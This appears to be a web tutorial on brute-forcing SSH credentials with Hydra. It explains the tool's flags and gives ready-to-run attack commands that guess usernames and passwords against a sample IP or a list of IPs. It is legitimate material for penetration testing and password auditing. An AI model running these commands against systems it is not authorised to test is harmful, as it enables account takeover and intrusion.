How to use Hydra to Brute-Force SSH Connections?

By /
Brute Force SSH Using Hydra

Let’s learn to Brute-force SSH Using Hydra. Hydra is one of the favorite tools in a hacker’s toolkit. It is an excellent tool for performing brute force attacks and can be used from a red team perspective to break into systems as well as from a blue team perspective to audit and test ssh passwords against common password lists like rockyou.txt and crackstation wordlists.

Note: This guide is purely for educational purposes. We do not claim liability for any property damages caused by the use of the knowledge gained from this guide.

Before we go ahead let’s first understand what SSH is.

What is SSH (Secure Shell)?

SSH, or Secure Shell, is a widely used protocol that enables secure communication between two devices over an unsecured network. This protocol encrypts data that is exchanged between the devices, ensuring that the communication remains private and protected from eavesdropping or tampering.

SSH is commonly used for remote administration, file transfers, and managing network infrastructure. It is an essential tool for maintaining security in the digital world, as it helps protect sensitive information and system access from unauthorized users.

What is a Brute Force SSH attack?

However, like any security measure, SSH can be targeted by cyberattacks. One such attack is the brute-force attack, which involves systematically trying different combinations of usernames and passwords in an attempt to gain access to a system. This method can be time-consuming and resource-intensive, but it is sometimes successful, particularly when weak or easily guessable credentials are used.

What is Hydra?

Hydra is an open-source parallelized login cracker that allows us to perform various kinds of brute force or dictionary attacks using wordlists. It comes by default with all Pentesting Distros like Kali Linux. Some common protocols that Hydra supports include SSH (Secure Shell), FTP (File Transfer Protocol), and HTTP (Hypertext Transfer Protocol), among many others. However, it can also be installed with the apt command as follows:

$ sudo apt install hydra

In case the package is not found, or you run into an error, you can also refer to the Github repo and install it using the specified instructions.

How to Use Hydra?

To use Hydra, you need to specify the necessary flags and options according to your attack requirements. Here’s a simple example of attacking an SSH server with a known username and a wordlist of passwords:

$ hydra -l john.doe -P /path/to/wordlist.txt 192.168.1.100 ssh

This command would attempt to find the correct password for the user “john.doe” on the SSH server at IP address 192.168.1.100 using the provided wordlist.

Explanation of the basic syntax of hydra

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]

Let’s take a closer look at its syntax components and what they mean:

  1. -l LOGIN or -L FILE: Choose a single target username (LOGIN) or a file with a list of usernames (FILE).
  2. -p PASS or -P FILE: Select one password (PASS) or a file with multiple passwords (FILE).
  3. -C FILE: Use a file containing username/password pairs, separated by colons.
  4. -e nsr: Enable extra password checks (‘n’ for null, ‘s’ for the same as the username, and ‘r’ for reversed).
  5. -o FILE: Save the results to a file.
  6. -t TASKS: Set the number of tasks (threads) to run in parallel.
  7. -M FILE: Use a file containing IP addresses or hostnames to target.
  8. -T TASKS: Set the number of tasks (threads) per target when using multiple IPs/hostnames.
  9. -w TIME: Set the time to wait (in seconds) between retries.
  10. -W TIME: Set the time to wait (in seconds) between login attempts.
  11. -f: Stop the attack once a valid username/password combination is found.
  12. -s PORT: Choose the target port number.
  13. -x MIN:MAX:CHARSET: Configure a brute force attack, defining minimum (MIN) and maximum (MAX) password length and character set (CHARSET).
  14. -c TIME: Set the time to wait (in seconds) before closing idle connections.
  15. -I: Turn off SSL/TLS certificate checks.
  16. -S: Turn on SSL/TLS connections.
  17. -o: Use OpenSSH-style host and port specifications.
  18. -u: Resume a previous session.
  19. -v: Verbose mode. Use -V for even more detail.
  20. -d: Enable debug mode.
  21. -4: Force IPv4 usage.
  22. -6: Force IPv6 usage.
  23. -m MODULE_OPT: Set module-specific options.
  24. service://server[:PORT][/OPT]: Specify the service to attack (e.g., ssh, ftp, http), the server’s IP or hostname, and any optional service-specific options.

Brute-force SSH Usernames and Passwords with Hydra

While trying to brute-force ssh credentials there are 3 possible combinations:

  • Bruteforcing Passwords
  • Bruteforcing Usernames
  • Bruteforcing Passwords and Usernames

First things first we would need wordlists for our brute-force attack. You can fetch some well knows wordlists with wordlistctl and once you have your wordlist ready, we can move on !

1. Bruteforcing Passwords

To brute-force ssh passwords with a known username, the syntax is :

$ hydra -l <username> -P <path to wordlist> <IP> ssh

2. Bruteforcing Username

To brute-force ssh usernames with a known password, the syntax is :

$ hydra -L <path to wordlist> -p <password> <IP> ssh

3. Bruteforcing Both Usernames And Passwords

If you do not know both the username and the password, the syntax is as follows:

$ hydra -L <path to username wordlist> -P <path to password wordlist> <IP> ssh

Some Special Flags

Sometimes we have some special conditions and we need to orchestrate our attack according to that. In this section, we will discuss some special flags which helps us to customize our attacks.

1. Change The Number Of Threads

By default, hydra runs 16 threads but we can change the value of the same with the -t flag as such :

$ hydra -l <username> -P <path to wordlist> <IP> -t <number of threads> ssh

Example of a Hydra attack against an SSH server with a custom number of threads,

$ hydra -l john.doe -P /path/to/wordlist.txt 192.168.1.100 -t 32 ssh

2. Change The Port Number

Sometimes, sysadmins change the ssh port number from the default 22 to some other port. Hence, to use a different port number, we use the -s flag as :

$ hydra -s <port number> -l <username> -P <path to wordlist> <IP> ssh

3. Brute Forcing A List Of IPs

Just like we can bruteforce a list of usernames and passwords, we can also brute-force ssh IPs from a list using the -M flag :

$ hydra -l <username> -P <path to wordlist> -M <path to Ip list> ssh

4. Miscellaneous

We can also enable a more verbose output with the -V flag. Also, sometimes the users/sysadmins leave certain obvious passwords that need to be accounted for beyond the scope of our wordlists which can be included with the -e flag. A popular trio that goes with this flag are the letters ‘nsr’, where ‘n’ stands for null and tries to log in without any flag at all, ‘s‘ stands for same, i.e, it uses the username itself as a password while ‘r‘ tries the reversed username as a potential password. The syntax for this should look like this :

$ hydra -l <username> -P <path to wordlist> <IP> -V -e nsr ssh

5. -V (Verbose Mode) in Hydra

The verbose mode can be helpful for a better understanding of the progress and results of the attack. To enable verbose mode, simply use the -V flag:

$ hydra -l <username> -P <path to wordlist> <IP> -V ssh

Example of a Hydra attack against an SSH server with verbose mode enabled:

$ hydra -l john.doe -P /path/to/wordlist.txt 192.168.1.100 -V ssh

6. -e nsr flag in Hydra

To use Hydra with the -e nsr flag, which tests for null passwords, the same passwords as the username, and reversed username passwords:

$ hydra -l <username> -P <path to wordlist> <IP> -e nsr ssh

Example of a Hydra attack against an SSH server using the -e nsr flag:

$ hydra -l john.doe -P /path/to/wordlist.txt 192.168.1.100 -e nsr ssh

7. -s flag in Hydra

To specify a custom port number for the SSH server using the -s flag:

$ hydra -s <port number> -l <username> -P <path to wordlist> <IP> ssh

Example of a Hydra attack against an SSH server with a custom port number (2222):

$ hydra -s 2222 -l john.doe -P /path/to/wordlist.txt 192.168.1.100 ssh

8. -h flag (To know more usage of Hydra)

The -h flag is used to display Hydra’s help menu, which provides an overview of the available options and their usage:

$ hydra -h

This command will output the help menu, giving you a comprehensive list of flags and options to customize your Hydra attacks.

Conclusion

Hydra can be a pretty powerful tool when you want to brute-force ssh connections and can be coupled with several other flags to customize your attack. However, this must not be exploited to poke around stuff you are not meant to and the users alone are accountable for their actions.